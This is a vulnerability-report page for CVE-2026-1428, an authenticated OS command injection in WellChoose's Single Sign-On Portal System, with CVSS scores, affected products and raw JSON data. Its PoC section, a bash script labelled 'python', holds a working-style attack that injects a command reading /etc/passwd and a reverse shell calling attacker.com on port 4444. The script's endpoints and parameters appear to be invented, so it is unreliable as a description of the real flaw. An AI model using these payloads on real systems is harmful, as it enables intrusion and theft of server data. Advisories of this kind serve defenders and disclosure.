Security Vulnerability Report
中文
CVE-2026-1428 CVSS 8.8 HIGH

CVE-2026-1428

Published: 2026-01-26 09:15:47
Last Modified: 2026-03-11 22:50:28

Description

Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wellchoose:single_sign-on_portal_system:*:*:*:*:*:*:*:* - VULNERABLE
WellChoose Single Sign-On Portal System < 修复版本
所有未更新至安全版本的部署实例

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2026-1428 PoC - WellChoose SSO Portal System Command Injection # Authentication required (low privilege user) TARGET="https://target.example.com/sso" USERNAME="attacker" PASSWORD="password123" # Login to obtain session cookie SESSION=$(curl -s -c cookies.txt -d "username=$USERNAME&password=$PASSWORD" \ "$TARGET/login" | grep -oP 'session=\K[^;]+') # Command injection payload - extract passwd file PAYLOAD="; cat /etc/passwd #" curl -s -b cookies.txt \ -d "username=$PAYLOAD&action=profile" \ "$TARGET/user/update" | grep "root:" # Reverse shell payload example REVERSE_PAYLOAD="; bash -i >& /dev/tcp/attacker.com/4444 0>&1 #" curl -s -b cookies.txt \ -d "username=$REVERSE_PAYLOAD&action=config" \ "$TARGET/system/settings" echo "[+] Exploitation attempted. Check listener on port 4444"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1428", "sourceIdentifier": "[email protected]", "published": "2026-01-26T09:15:47.433", "lastModified": "2026-03-11T22:50:28.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server."}, {"lang": "es", "value": "El Sistema de Portal de Inicio de Sesión Único desarrollado por WellChoose tiene una vulnerabilidad de inyección de comandos del sistema operativo, permitiendo a atacantes remotos autenticados inyectar comandos arbitrarios del sistema operativo y ejecutarlos en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wellchoose:single_sign-on_portal_system:*:*:*:*:*:*:*:*", "versionEndExcluding": "iftop_p4_181", "matchCriteriaId": "F6466370-06D4-4AE1-9E0D-DF0BBE2690E5"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10655-59160-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10654-23f40-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}